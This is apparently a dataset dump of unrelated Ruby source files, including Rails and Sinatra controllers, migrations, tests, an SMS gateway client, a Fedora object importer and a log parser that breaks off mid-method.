text stringlengths 10 2.61M |
|---|
require 'benchmark'
# Warmup iterations
WARMUP_ITRS = ENV.fetch('WARMUP_ITRS', 15).to_i
# Minimum number of benchmarking iterations
MIN_BENCH_ITRS = ENV.fetch('MIN_BENCH_ITRS', 10).to_i
# Minimum benchmarking time in seconds
MIN_BENCH_TIME = ENV.fetch('MIN_BENCH_TIME', 10).to_i
default_path = "results-#{RUBY_ENGINE}-#{RUBY_ENGINE_VERSION}-#{Time.now.strftime('%F-%H%M%S')}.csv"
OUT_CSV_PATH = File.expand_path(ENV.fetch('OUT_CSV_PATH', default_path))
puts RUBY_DESCRIPTION
# Takes a block as input
def run_benchmark(num_itrs_hint)
times = []
total_time = 0
num_itrs = 0
begin
time = Benchmark.realtime { yield }
num_itrs += 1
# NOTE: we may want to avoid this as it could trigger GC?
time_ms = (1000 * time).to_i
puts "itr \##{num_itrs}: #{time_ms}ms"
# NOTE: we may want to preallocate an array and avoid append
# We internally save the time in seconds to avoid loss of precision
times << time
total_time += time
end until num_itrs >= WARMUP_ITRS + MIN_BENCH_ITRS and total_time >= MIN_BENCH_TIME
# Write each time value on its own line
File.write(OUT_CSV_PATH, "#{RUBY_DESCRIPTION}\n#{times.join("\n")}\n")
end
|
class UserController < ApplicationController
get '/signup' do
if user_signed_in?
flash.next[:greeting] = "Already logged in as #{current_user.username}"
redirect '/diary-list'
else
erb :"users/new"
end
end
post '/signup' do
user = User.new(params)
if User.all.any?{|user|user.email.downcase == params["email"].downcase || user.username.downcase == params["username"].downcase}
flash.next[:error] = "Email or Username is already taken"
redirect "/signup"
else
if user.save
session[:user_id] = user.id
flash.next[:greeting] = "Welcome, #{user.username}"
redirect '/diary-list'
else
flash.next[:error] = "Username, email, and password are required to create an account."
redirect '/signup'
end
end
end
get '/login' do
if user_signed_in?
flash.next[:greeting] = "Already logged in as #{current_user.username}"
redirect '/diary-list'
else
erb :"users/login"
end
end
post '/login' do
user = User.find_by(:username => params["username"])
if user && user.authenticate(params["password"])
session[:user_id] = user.id
flash.next[:greeting] = "Welcome back, #{user.username}"
redirect "/diary-list"
else
flash.next[:error] = "Login Failed. Please Try Again."
redirect "/login"
end
end
get '/logout' do
if user_signed_in?
session.clear
flash.next[:greeting] = "You've been logged out"
redirect '/'
else
flash.next[:greeting] = "You were not logged in"
redirect '/'
end
end
end
|
##
# Kernel
#
# ISO 15.3.1
module Kernel
##
# Print human readable object description
#
# ISO 15.3.1.2.9
# ISO 15.3.1.3.34
def p(*args)
i = 0
len = args.size
while i < len
__printstr__ args[i].inspect
__printstr__ "\n"
i += 1
end
args.__svalue
end
def printf(*args)
__printstr__(sprintf(*args))
nil
end
end
|
require 'faraday'
module Pling
module Mobilant
class Gateway < ::Pling::Gateway
handles :sms, :mobilant, :mobile
def initialize(configuration)
super
require_configuration([:key])
end
def deliver!(message, device)
params = {}
# require url parameter
params[:message] = message.body
params[:to] = sanitize_identifier(device.identifier)
params[:route] = route
params[:key] = configuration[:key]
params[:charset] = configuration[:charset] if configuration[:charset]
# optional url parameter
params[:from] = source if source
params[:debug] = debug if debug
response = connection.get do |request|
request.url(configuration[:delivery_url], params)
end
response_code = response.body.lines.first
if error = ::Pling::Mobilant.error_by_response_code(response_code)
raise error
else
nil
end
end
private
def default_configuration
super.merge({
:delivery_url => 'https://gw.mobilant.net/',
:adapter => :net_http,
:connection => {},
:route => :lowcost
})
end
def connection
@connection ||= Faraday.new(configuration[:connection]) do |builder|
builder.use Faraday::Request::UrlEncoded
builder.use Faraday::Response::Logger if configuration[:debug]
builder.adapter(configuration[:adapter])
end
end
def route
route = (configuration[:route] || :lowcost)
[:lowcost, :lowcostplus, :direct, :directplus].include?(route) ? route : raise(::Pling::Mobilant::InvalidRoute, "Invalid route")
end
def debug
configuration[:debug] ? 1 : nil
end
def source
return nil unless configuration[:source]
configuration[:source].to_s.strip
end
def sanitize_identifier(identifier)
identifier.gsub(/^\+/, "00").gsub(/\D/, '')
end
end
end
end
|
# frozen_string_literal: true
class AppearancesChannel < ApplicationCable::Channel
def subscribed
redis.set("user_#{current_user.slug}_online", '1')
stream_from('appearances_channel')
AppearanceBroadcastJob.perform_later(current_user.slug, true)
end
def unsubscribed
redis.del("user_#{current_user.slug}_online")
AppearanceBroadcastJob.perform_later(current_user.slug, false)
end
private
def redis
Redis.new
end
end
|
# == Schema Information
#
# Table name: reviews
#
# id :integer not null, primary key
# rating :integer
# content :text
# created_at :datetime not null
# updated_at :datetime not null
# movie_id :integer
#
class Review < ActiveRecord::Base
belongs_to :movie
validates :rating, :inclusion => { :in => 1..5 }
end
|
# frozen_string_literal: true
module Decidim
module Opinions
module Admin
# A command with all the business logic when an admin merges opinions from
# one component to another.
class MergeOpinions < Rectify::Command
# Public: Initializes the command.
#
# form - A form object with the params.
def initialize(form)
@form = form
end
# Executes the command. Broadcasts these events:
#
# - :ok when everything is valid.
# - :invalid if the form wasn't valid and we couldn't proceed.
#
# Returns nothing.
def call
return broadcast(:invalid) unless form.valid?
broadcast(:ok, merge_opinions)
end
private
attr_reader :form
def merge_opinions
transaction do
merged_opinion = create_new_opinion
merged_opinion.link_resources(opinions_to_link, "copied_from_component")
form.opinions.each(&:destroy!) if form.same_component?
merged_opinion
end
end
def opinions_to_link
return previous_links if form.same_component?
form.opinions
end
def previous_links
@previous_links ||= form.opinions.flat_map do |opinion|
opinion.linked_resources(:opinions, "copied_from_component")
end
end
def create_new_opinion
original_opinion = form.opinions.first
Decidim::Opinions::OpinionBuilder.copy(
original_opinion,
author: form.current_organization,
action_user: form.current_user,
extra_attributes: {
component: form.target_component
},
skip_link: true
)
end
end
end
end
end
|
class NewsReader::Section
attr_accessor :name, :url
@@all = []
def initialize(section_hash)
@articles = []
section_hash.each {|key, value| self.send("#{key}=", value)}
@@all << self
end
def self.all
@@all
end
def add_article(article)
raise "invalid article" if !article.is_a?(NewsReader::Article)
@articles << article
end
def articles
@articles.dup.freeze
end
def self.fetch_sections
if self.all.empty?
home_url = "https://news.yahoo.com/"
sections = NewsReader::Scraper.scrape_sections(home_url)
end
end
def fetch_articles
NewsReader::Scraper.scrape_section_page(self) if articles.empty?
end
end
|
class AddCookies < ActiveRecord::Migration
def self.up
create_table "cookies" do |t|
t.column "owner_type", :string, :null => false
t.column "owner_id", :integer, :null => false
t.column "text", :string, :null => false
t.column "created_at", :datetime, :null => false
t.column "usage", :string, :null => false
t.column "expires_at", :datetime
end
end
def self.down
drop_table "cookies"
end
end
|
shared_examples 'idv max step attempts' do |sp|
it 'allows 3 attempts in 24 hours', :email do
visit_idp_from_sp_with_loa3(sp)
user = register_user
max_attempts_less_one.times do
visit verify_session_path
fill_out_idv_form_fail
click_idv_continue
expect(current_path).to eq verify_session_result_path
end
user.reload
expect(user.idv_attempted_at).to_not be_nil
fill_out_idv_form_fail
click_idv_continue
expect(page).to have_css('.alert-error', text: t('idv.modal.sessions.heading'))
visit_idp_from_sp_with_loa3(sp)
expect(page).to have_content(
t('idv.messages.hardfail', hours: Figaro.env.idv_attempt_window_in_hours)
)
expect(current_url).to eq verify_fail_url
visit verify_session_path
expect(page).to have_content(t('idv.errors.hardfail'))
expect(current_url).to eq verify_fail_url
user.reload
expect(user.idv_attempted_at).to_not be_nil
end
scenario 'profile shows failure flash message after max attempts', :email do
visit_idp_from_sp_with_loa3(sp)
register_user
click_idv_begin
max_attempts_less_one.times do
fill_out_idv_form_fail
click_idv_continue
expect(current_path).to eq verify_session_result_path
end
fill_out_idv_form_fail
click_idv_continue
expect(page).to have_css('.alert-error', text: t('idv.modal.sessions.heading'))
expect(current_path).to eq verify_session_result_path
end
scenario 'phone shows failure flash after max attempts', :email do
visit_idp_from_sp_with_loa3(sp)
register_user
click_idv_begin
fill_out_idv_form_ok
click_idv_continue
click_idv_address_choose_phone
max_attempts_less_one.times do
fill_out_phone_form_fail
click_idv_continue
expect(current_path).to eq verify_phone_result_path
end
fill_out_phone_form_fail
click_idv_continue
expect(page).to have_css('.alert-error', text: t('idv.modal.phone.heading'))
expect(current_path).to eq verify_phone_result_path
end
end
|
class Api::V1::SongsController < ApplicationController
before_action :set_song, only: [:show, :update, :destroy]
def index
@songs = Song.where(:playlist_id => params[:playlist_id])
json_response(object: @songs)
end
def create
@song = Song.create!(
title: params[:title],
artist: params[:artist],
genre: params[:genre]
playlist_id: params[:playlist_id],
)
if @song
json_response(object: @song, message: "song saved!", status: :created)
end
end
def show
json_response(object: @song)
end
def update
@song.update(title: params["title"], artist: params["artist"], genre: params["genre"], playlist_id: params["playlist_id"])
json_response(object: @song)
end
def destroy
@song.destroy
head :no_content
end
private
def set_song
@song = Song.find_by!(id: params[:id])
end
def song_params
params.permit(:title, :artist, :genre, :playlist_id)
end
end |
class ChangeDatatypeConductorIdOfConcerts < ActiveRecord::Migration
def change
change_column :concerts, :conductor_id, :integer
end
end
|
class CreateRestaurants < ActiveRecord::Migration[5.1]
def change
create_table :restaurants do |t|
t.string :name
t.string :cuisine
t.text :description
t.string :location
t.string :address
t.string :phone_number
t.integer :price_for_two
t.string :working_hours
t.boolean :has_community
t.boolean :has_sourcing
t.boolean :has_recycling
t.string :photos
t.timestamps
end
end
end
|
require 'helper'
class ActiveRecordTest < Minitest::Test
class PostStates < StateManager::Base
attr_accessor :before_callbacks_called
attr_accessor :after_callbacks_called
state :unsubmitted do
event :submit, :transitions_to => 'submitted.awaiting_review'
event :activate, :transitions_to => 'active'
end
state :submitted do
state :awaiting_review do
event :review, :transitions_to => 'submitted.reviewing'
end
state :reviewing do
event :accept, :transitions_to => 'active'
event :clarify, :transitions_to => 'submitted.clarifying'
end
state :clarifying do
event :review, :transitions_to => 'submitted.reviewing'
end
end
state :active
state :rejected
state :mutated
attr_accessor :unsubmitted_entered_count
attr_accessor :unsubmitted_enter_committed_count
attr_accessor :unsubmitted_exit_committed_count
attr_accessor :active_entered_count
attr_accessor :active_enter_committed_count
attr_accessor :active_exit_committed_count
def initialize(*args)
super
@unsubmitted_entered_count = 0
@unsubmitted_enter_committed_count = 0
@unsubmitted_exit_committed_count = 0
@active_entered_count = 0
@active_enter_committed_count = 0
@active_exit_committed_count =0
end
def will_transition(*args)
self.before_callbacks_called = true
end
def did_transition(*args)
self.after_callbacks_called = true
end
class Unsubmitted
def entered
state_manager.unsubmitted_entered_count += 1
end
def enter_committed
state_manager.unsubmitted_enter_committed_count += 1
end
def exit_committed
state_manager.unsubmitted_exit_committed_count += 1
end
end
class Active
def entered
state_manager.active_entered_count += 1
end
def enter_committed
state_manager.active_enter_committed_count += 1
end
def exit_committed
state_manager.active_exit_committed_count += 1
end
end
class Mutated
def entered
self.title = 'mutant'
save
end
end
end
class Post < ActiveRecord::Base
extend StateManager::Resource
state_manager
end
def exec(sql)
ActiveRecord::Base.connection.execute sql
end
def setup
ActiveRecord::Base.establish_connection(
:adapter => "sqlite3",
:database => ":memory:" #"tmp/test"
)
ActiveRecord::Schema.define do
create_table :posts do |t|
t.string :title
t.string :body
t.string :state
end
end
exec "INSERT INTO posts VALUES(1, NULL, NULL, NULL)"
exec "INSERT INTO posts VALUES(2, NULL, NULL, 'unsubmitted')"
exec "INSERT INTO posts VALUES(3, NULL, NULL, 'submitted.reviewing')"
exec "INSERT INTO posts VALUES(4, NULL, NULL, 'submitted.bad_state')"
@resource = nil
DatabaseCleaner.start
end
def teardown
DatabaseCleaner.clean
ActiveRecord::Base.connection.disconnect!
end
def test_adapter_included
@resource = Post.find(1)
assert @resource.is_a?(StateManager::Adapters::ActiveRecord::ResourceMethods)
assert @resource.state_manager.is_a?(StateManager::Adapters::ActiveRecord::ManagerMethods)
end
def test_persist_initial_state
@resource = Post.find(1)
assert_state 'unsubmitted'
assert !@resource.state_manager.before_callbacks_called
assert !@resource.state_manager.after_callbacks_called
assert @resource.changed?, "state should not have been persisted"
@resource.transaction do
@resource.save
assert @resource.state_manager.before_callbacks_called
assert @resource.state_manager.after_callbacks_called
end
end
def test_initial_state_value
@resource = Post.find(3)
assert_state 'submitted.reviewing'
end
def test_validate_nil_state
@resource = Post.find(1)
assert !@resource.state
@resource.save
assert_state 'unsubmitted'
end
def test_validate_invalid_state
@resource = Post.find(4)
assert_equal 'submitted.bad_state', @resource.state
@resource.save
assert_state 'unsubmitted'
end
def test_new_record
@resource = Post.new
assert_state 'unsubmitted'
assert @resource.new_record?, 'record should not have been persisted'
@resource.save
@resource.submit!
assert_state 'submitted.awaiting_review'
assert !@resource.new_record?, 'record should be persisted'
end
def test_scopes
exec "INSERT INTO posts VALUES(5, NULL, NULL, 'submitted.reviewing')"
exec "INSERT INTO posts VALUES(6, NULL, NULL, 'submitted.reviewing')"
exec "INSERT INTO posts VALUES(7, NULL, NULL, 'submitted.reviewing')"
exec "INSERT INTO posts VALUES(8, NULL, NULL, 'submitted.reviewing')"
exec "INSERT INTO posts VALUES(9, NULL, NULL, 'submitted.clarifying')"
exec "INSERT INTO posts VALUES(10, NULL, NULL, 'submitted.clarifying')"
exec "INSERT INTO posts VALUES(11, NULL, NULL, 'active')"
exec "INSERT INTO posts VALUES(12, NULL, NULL, 'active')"
exec "INSERT INTO posts VALUES(13, NULL, NULL, 'active')"
exec "INSERT INTO posts VALUES(14, NULL, NULL, 'active')"
# +1 from setup
assert_equal 1, Post.unsubmitted.count
# +1 from setup (one is in a bad state)
assert_equal 7, Post.submitted.count
assert_equal 4, Post.active.count
assert_equal 0, Post.rejected.count
end
def test_multiple_transitions
@resource = Post.find(2)
@resource.submit!
assert_state 'submitted.awaiting_review'
@resource.review!
assert_state 'submitted.reviewing'
end
def test_dirty_transition
@resource = Post.find(2)
@resource.state_manager.send_event :submit
assert_state 'submitted.awaiting_review'
assert_raises(StateManager::Adapters::ActiveRecord::DirtyTransition) do
@resource.state_manager.send_event :review
end
end
def test_commit_callbacks
@resource = Post.find(1)
assert_state 'unsubmitted'
assert !@resource.state_manager.before_callbacks_called
assert !@resource.state_manager.after_callbacks_called
assert @resource.changed?, "state should not have been persisted"
@resource.transaction do
@resource.save!
assert @resource.state_manager.before_callbacks_called
assert @resource.state_manager.after_callbacks_called
assert_equal @resource.state_manager.unsubmitted_enter_committed_count, 0
@resource.activate!
assert_equal @resource.state_manager.unsubmitted_exit_committed_count, 0
assert_equal @resource.state_manager.active_enter_committed_count, 0
end
assert_equal 1, @resource.state_manager.unsubmitted_enter_committed_count
assert_equal 1, @resource.state_manager.unsubmitted_exit_committed_count
assert_equal 1, @resource.state_manager.active_enter_committed_count
@resource.title = 'blah'
@resource.save!
assert_equal 1, @resource.state_manager.unsubmitted_enter_committed_count
assert_equal 1, @resource.state_manager.unsubmitted_exit_committed_count
assert_equal 1, @resource.state_manager.active_enter_committed_count
end
def test_commit_callbacks_on_create
Post.transaction do
@resource = Post.new
assert !@resource.state_manager.after_callbacks_called
@resource.save
assert @resource.state_manager.after_callbacks_called
assert_equal 1, @resource.state_manager.unsubmitted_entered_count
assert_equal 0, @resource.state_manager.unsubmitted_enter_committed_count
end
assert_equal 1, @resource.state_manager.unsubmitted_enter_committed_count
end
def test_commit_callbacks_on_different_initial_state
Post.transaction do
@resource = Post.new(:state => 'active')
assert !@resource.state_manager.after_callbacks_called
@resource.save
assert @resource.state_manager.after_callbacks_called
end
assert_equal @resource.state_manager.unsubmitted_entered_count, 0
assert_equal @resource.state_manager.active_entered_count, 1
assert_equal @resource.state_manager.active_enter_committed_count, 1
end
def test_save_in_entered_callback
@resource = Post.new(:state => 'mutated')
@resource.save
assert_equal 'mutant', @resource.title
end
end
|
require 'import/dc_parser'
require 'import/legacy_object'
require 'import/rels_ext_parser'
class PidAlreadyInUseError < StandardError; end
class ObjectFactory
# Used by the ObjectImporter to select the right class for
# importing a fedora object.
# This code relies on assumptions about how the fedora data
# looks in Digital Case 1.0 (the source fedora that we will
# import objects from).
# For example, in Digital Case 1.0 there are some objects
# with a datastream that has a dsid called "VIDEO" and has
# a controlGroup of "R" or "E". When we import that object,
# we are assuming that the object's class should be Video
# and that the dsLocation of the "VIDEO" datastream should
# become the url for a LinkedResource that is associated with
# that new Video object.
def initialize(source_object)
@source_object = source_object
end
# Initialize a new object with attributes from the source
# object's DC datastream. The type of work that will be
# returned will be decided by examining the @source_object.
def build_object
validate_datastreams!
attrs = DcParser.from_xml(@source_object.datastreams['DC'].content).to_h
obj = LegacyObject.new(attrs)
obj.pid = set_pid
obj.visibility = visibility
return object_class, obj
end
def visibility
Hydra::AccessControls::AccessRight::VISIBILITY_TEXT_VALUE_PUBLIC
end
def validate_datastreams!
datastreams = @source_object.datastreams
uniq_datastreams = datastreams.keys.map(&:upcase).map { |f| f.sub(/\.XML/, '')}.uniq
raise "Datastreams are not unique for #{@source_object.pid}" unless uniq_datastreams.size == datastreams.size
end
def set_pid
if ActiveFedora::Base.exists?(@source_object.pid)
raise PidAlreadyInUseError.new
end
@source_object.pid
end
def object_class
if collection?
Collection
elsif video? or has_links_to_video?
Video
elsif audio?
Audio
elsif has_tei?
Text
elsif image?
Image
elsif has_pdf?
Text
elsif has_external_video_link?
Video
elsif has_external_article_link?
Text
else
Text
end
end
def mime_types
return @mime_types if @mime_types
@mime_types = []
@source_object.datastreams.keys.each do |dsid|
@mime_types << @source_object.datastreams[dsid].mimeType
end
@mime_types = @mime_types.compact.uniq
end
def member_ids
return @member_ids if @member_ids
@member_ids = []
if @source_object.datastreams['RELS-EXT']
rels = @source_object.datastreams['RELS-EXT'].content
@member_ids = RelsExtParser.new(rels).collection_member_ids
end
end
def collection?
!member_ids.empty?
end
def video?
video_types = ['video/mpeg', 'video/mp4']
mime_types.any?{|mime_type| video_types.include?(mime_type) }
end
def audio?
audio_types = ['audio/x-wav', 'audio/mpeg']
mime_types.any?{|mime_type| audio_types.include?(mime_type) }
end
def has_tei?
tei_dsids = ['tei', 'teip5', 'tei.xml', 'teip5.xml']
@source_object.datastreams.keys.any? { |dsid|
tei_dsids.include?(dsid.downcase)
}
end
def image?
image_extensions = ['tif', 'gif', 'jp2', 'jpg']
@source_object.datastreams.keys.any?{ |dsid|
file_extension = dsid.match(/^.*\.(.*)$/)
file_extension = file_extension[1] if file_extension
file_extension = file_extension.downcase if file_extension
image_extensions.include?(file_extension)
}
end
def has_pdf?
pdf_types = ['application/pdf']
mime_types.any?{|mime_type| pdf_types.include?(mime_type) }
end
def has_external_video_link?
dsids_for_videos = ['video']
has_external_link_for?(dsids_for_videos)
end
def has_external_article_link?
dsids_for_texts = ['article']
has_external_link_for?(dsids_for_texts)
end
def has_external_link_for?(special_dsids)
@source_object.datastreams.keys.any?{ |dsid|
has_matching_dsid = special_dsids.map(&:downcase).include?(dsid.downcase)
ds = @source_object.datastreams[dsid]
has_matching_dsid && (ds.external? || ds.redirect?)
}
end
# Load items that have a link to youtube as video instead of text
def has_links_to_video?
@source_object.datastreams.keys.any?{ |dsid|
has_link_dsid = ["link"].map(&:downcase).include?(dsid.downcase)
ds = @source_object.datastreams[dsid]
has_link_dsid && (ds.dsLocation.include? "youtube.com")
}
end
end
|
# require "for_test_helper"
# describe "FOV" do
# MAP8_RING0 = [
# "#####",
# "#####",
# "##@##",
# "#####",
# "#####"
# ]
# RESULT_MAP8_RING0 = [
# " ",
# " ... ",
# " ... ",
# " ... ",
# " "
# ]
# RESULT_MAP8_RING0_90_NORTH = [
# " ",
# " ... ",
# " . ",
# " ",
# " "
# ]
# RESULT_MAP8_RING0_90_SOUTH = [
# " ",
# " ",
# " . ",
# " ... ",
# " "
# ]
# RESULT_MAP8_RING0_90_EAST = [
# " ",
# " . ",
# " .. ",
# " . ",
# " "
# ]
# RESULT_MAP8_RING0_90_WEST = [
# " ",
# " . ",
# " .. ",
# " . ",
# " "
# ]
# RESULT_MAP8_RING0_180_NORTH = [
# " ",
# " ... ",
# " ... ",
# " ",
# " "
# ]
# RESULT_MAP8_RING0_180_SOUTH = [
# " ",
# " ",
# " ... ",
# " ... ",
# " "
# ]
# RESULT_MAP8_RING0_180_EAST = [
# " ",
# " .. ",
# " .. ",
# " .. ",
# " "
# ]
# RESULT_MAP8_RING0_180_WEST = [
# " ",
# " .. ",
# " .. ",
# " .. ",
# " "
# ]
# MAP8_RING1 = [
# "#####",
# "#...#",
# "#.@.#",
# "#...#",
# "#####"
# ]
# RESULT_MAP8_RING1 = [
# ".....",
# ".....",
# ".....",
# ".....",
# "....."
# ]
# describe "Discrete Shadowcasting" do
# describe "8-topology" do
# it "should compute visible ring0" do
# lightPasses = buildLightCallback(MAP8_RING0)
# fov = new RotRails::FOV.DiscreteShadowcasting(lightPasses, {topology:8})
# checkResult(fov, lightPasses.center, RESULT_MAP8_RING0)
# end
# it "should compute visible ring1" do
# lightPasses = buildLightCallback(MAP8_RING1)
# fov = new RotRails::FOV.DiscreteShadowcasting(lightPasses, {topology:8})
# checkResult(fov, lightPasses.center, RESULT_MAP8_RING1)
# end
# end
# end
# describe "Precise Shadowcasting" do
# describe "8-topology" do
# it "should compute visible ring0" do
# lightPasses = buildLightCallback(MAP8_RING0)
# fov = new RotRails::FOV.PreciseShadowcasting(lightPasses, {topology:8})
# checkResult(fov, lightPasses.center, RESULT_MAP8_RING0)
# end
# it "should compute visible ring1" do
# lightPasses = buildLightCallback(MAP8_RING1)
# fov = new RotRails::FOV.PreciseShadowcasting(lightPasses, {topology:8})
# checkResult(fov, lightPasses.center, RESULT_MAP8_RING1)
# end
# end
# end
# describe "Recursive Shadowcasting" do
# describe "8-topology" do
# describe "360-degree view" do
# it "should compute visible ring0 in 360 degrees" do
# lightPasses = buildLightCallback(MAP8_RING0)
# fov = new RotRails::FOV.RecursiveShadowcasting(lightPasses, {topology:8})
# checkResult(fov, lightPasses.center, RESULT_MAP8_RING0)
# end
# it "should compute visible ring1 in 360 degrees" do
# lightPasses = buildLightCallback(MAP8_RING1)
# fov = new RotRails::FOV.RecursiveShadowcasting(lightPasses, {topology:8})
# checkResult(fov, lightPasses.center, RESULT_MAP8_RING1)
# end
# end
# describe "180-degree view" do
# it "should compute visible ring0 180 degrees facing north" do
# lightPasses = buildLightCallback(MAP8_RING0)
# fov = new RotRails::FOV.RecursiveShadowcasting(lightPasses, {topology:8})
# checkResult180Degrees(fov, 0, lightPasses.center, RESULT_MAP8_RING0_180_NORTH)
# end
# it "should compute visible ring0 180 degrees facing south" do
# lightPasses = buildLightCallback(MAP8_RING0)
# fov = new RotRails::FOV.RecursiveShadowcasting(lightPasses, {topology:8})
# checkResult180Degrees(fov, 4, lightPasses.center, RESULT_MAP8_RING0_180_SOUTH)
# end
# it "should compute visible ring0 180 degrees facing east" do
# lightPasses = buildLightCallback(MAP8_RING0)
# fov = new RotRails::FOV.RecursiveShadowcasting(lightPasses, {topology:8})
# checkResult180Degrees(fov, 2, lightPasses.center, RESULT_MAP8_RING0_180_EAST)
# end
# it "should compute visible ring0 180 degrees facing west" do
# lightPasses = buildLightCallback(MAP8_RING0)
# fov = new RotRails::FOV.RecursiveShadowcasting(lightPasses, {topology:8})
# checkResult180Degrees(fov, 6, lightPasses.center, RESULT_MAP8_RING0_180_WEST)
# end
# end
# describe "90-degree view" do
# it "should compute visible ring0 90 degrees facing north" do
# lightPasses = buildLightCallback(MAP8_RING0)
# fov = new RotRails::FOV.RecursiveShadowcasting(lightPasses, {topology:8})
# checkResult90Degrees(fov, 0, lightPasses.center, RESULT_MAP8_RING0_90_NORTH)
# end
# it "should compute visible ring0 90 degrees facing south" do
# lightPasses = buildLightCallback(MAP8_RING0)
# fov = new RotRails::FOV.RecursiveShadowcasting(lightPasses, {topology:8})
# checkResult90Degrees(fov, 4, lightPasses.center, RESULT_MAP8_RING0_90_SOUTH)
# end
# it "should compute visible ring0 90 degrees facing east" do
# lightPasses = buildLightCallback(MAP8_RING0)
# fov = new RotRails::FOV.RecursiveShadowcasting(lightPasses, {topology:8})
# checkResult90Degrees(fov, 2, lightPasses.center, RESULT_MAP8_RING0_90_EAST)
# end
# it "should compute visible ring0 90 degrees facing west" do
# lightPasses = buildLightCallback(MAP8_RING0)
# fov = new RotRails::FOV.RecursiveShadowcasting(lightPasses, {topology:8})
# checkResult90Degrees(fov, 6, lightPasses.center, RESULT_MAP8_RING0_90_WEST)
# end
# end
# end
# end
# end # /* FOV */ |
require('capybara/rspec')
require('./app')
Capybara.app = Sinatra::Application
set(:show_exceptions, false)
describe('adding a stylist', {:type => :feature}) do
it "allows a user to add a new stylist to the list" do
visit('/')
fill_in('stylist_name', :with => 'Ruby')
click_button('Add Stylist')
expect(page).to have_content('Ruby')
end
end
describe('deleting a stylist', {:type => :feature}) do
it "allows a user to delete a stylist on the list" do
stylist = Stylist.new({:name => "Meaghan", :id => nil})
stylist.save()
stylist2 = Stylist.new({:name => "Edu", :id => nil})
stylist2.save()
visit('/')
click_button('Delete Stylist')
click_link('Return Home')
expect(page).to have_content(stylist2.name())
end
end
|
require 'yajl'
module Logical::Naf
module LogParser
class Base
REGEX_OPTIONS = {
'i' => Regexp::IGNORECASE,
'x' => Regexp::EXTENDED,
'm' => Regexp::MULTILINE
}
DATE_REGEX = /((\d){8}_(\d){6})/
UUID_REGEX = /[a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{12}/
LOG_SIZE_CHUNKS = 500
attr_accessor :search_params,
:regex_options,
:grep,
:search_from_time,
:search_to_time,
:jsons,
:logs_size,
:log_type,
:newest_log,
:record_id,
:read_from_s3,
:s3_log_reader,
:last_file_checked,
:newest_file_checked
def initialize(params)
@search_params = params['search_params'].nil? ? '' : params['search_params']
@regex_options = get_option_value(params['regex_options'])
@grep = params['grep']
@search_from_time = params['from_time']
@search_to_time = params['to_time']
@jsons = []
@logs_size = 0
@log_type = params['log_type']
@newest_log = params['newest_log']
@record_id = params['record_id']
@read_from_s3 = params['read_from_s3']
@last_file_checked = params['last_file_checked']
@newest_file_checked = params['newest_file_checked']
end
def retrieve_logs
parse_files
check_repeated_logs
output = ''
jsons.reverse_each do |elem|
output.insert(0, insert_log_line(elem))
end
return {
logs: output.html_safe,
read_from_s3: read_from_s3,
last_file_checked: last_file_checked,
newest_file_checked: newest_file_checked,
newest_log: newest_log
}
end
def check_repeated_logs
if log_type == 'new' && newest_log.present?
@jsons.each_with_index do |elem, index|
if parse_log(elem) == parse_newest_log
@jsons = @jsons[(index + 1)..-1]
return
end
end
end
end
def parse_log(log)
if log['message'].scan(/\t/).present?
message = log['message'].clone
message.slice!('<top (required)>')
"#{log['output_time']} #{message}"
else
"#{log['output_time']} #{log['message']}"
end
end
def parse_files
files = filter_files
files.each do |file|
# Use Yajl JSON library to parse the log files, as they contain multiple JSON blocks
parser = Yajl::Parser.new
json = get_json_from_log_file(file)
parser.parse(json) do |log|
if self.class.to_s == 'Logical::Naf::LogParser::Runner'
log['id'] = get_invocation_id(file.scan(UUID_REGEX).first)
end
log['message'] = CGI::escapeHTML(log['message'])
filter_log_messages(log)
end
sort_jsons
if logs_size >= LOG_SIZE_CHUNKS
update_last_file_checked(file.scan(/\d+_\d{8}_\d{6}.*/).first)
break
end
end
if logs_size < LOG_SIZE_CHUNKS && files.present?
update_last_file_checked(files.last.scan(/\d+_\d{8}_\d{6}.*/).first)
end
end
def update_last_file_checked(file)
if file.present? && last_file_checked.present? && last_file_checked != 'null'
if Time.parse(file.scan(/\d{8}_\d{6}/).first) < Time.parse(last_file_checked.scan(/\d{8}_\d{6}/).first)
@last_file_checked = file
end
elsif file.present?
@last_file_checked = file
end
end
def get_json_from_log_file(file)
if read_from_s3 == 'true' && s3_log_reader.present?
s3_log_reader.retrieve_file(file)
else
File.new(file, 'r')
end
end
def filter_files
files = get_files
original_size = files.size
files.each_with_index do |file, index|
filename = file.scan(/\d+_\d{8}_\d{6}.*/).first
if log_type == 'old'
if filename == last_file_checked
if files.size == 1
files = []
else
files = files[(index + 1)..-1]
end
end
if files.size == 0 && read_from_s3 != 'true'
get_s3_files do
@read_from_s3 = 'true'
@s3_log_reader = ::Logical::Naf::LogReader.new
return retrieve_log_files_from_s3
end
end
elsif log_type == 'new'
if filename == newest_file_checked
if files.size == 1
files = []
else
files = files[0..(index - 1)]
end
end
end
break if original_size != files.size
end
if files.present?
if newest_file_checked.blank? || newest_file_checked == 'null'
@newest_file_checked = files[0].scan(/\d+_\d{8}_\d{6}.*/).first
else
if Time.parse(newest_file_checked.scan(DATE_REGEX)[0][0]) < Time.parse(files[0].scan(DATE_REGEX)[0][0])
@newest_file_checked = files[0].scan(/\d+_\d{8}_\d{6}.*/).first
end
end
end
return files
end
def filter_log_messages(log)
# Check that the message matches the search query. Highlight the matching results
if search_params.present?
log['message'].scan(Regexp.new(search_params, regex_options)).each do |match|
log['message'].gsub!(match, "<span style='background-color:yellow;'>#{match}</span>")
end
end
# Check that the log happened within the time range specified
if log_within_time_range(log['output_time'])
# If grep is selected, only show log messages that match the
# search query. Otherwise, show all log messages.
if grep == 'false' || log['message'] =~ Regexp.new(search_params, regex_options)
@jsons << log
@logs_size += 1
end
end
end
def log_within_time_range(log_time)
return true if (search_from_time.join('').blank? && search_to_time.join('').blank?) || log_time.blank?
if search_from_time.join('').present? && search_to_time.join('').present?
Time.parse(log_time) <= Time.parse(build_time_string(search_to_time)) &&
Time.parse(log_time) >= Time.parse(build_time_string(search_from_time))
elsif search_from_time.join('').present?
Time.parse(log_time) >= Time.parse(build_time_string(search_from_time))
elsif search_to_time.join('').present?
Time.parse(log_time) <= Time.parse(build_time_string(search_to_time))
end
end
def build_time_string(search_time)
# Year
search_built_time = search_time[0] + "-"
# Month
if search_time[1].to_i < 10
search_built_time << '0' + search_time[1] + '-'
else
search_built_time << search_time[1] + '-'
end
# Day
if search_time[2].to_i < 10
search_built_time << '0' + search_time[2] + ' '
else
search_built_time << search_time[2] + ' '
end
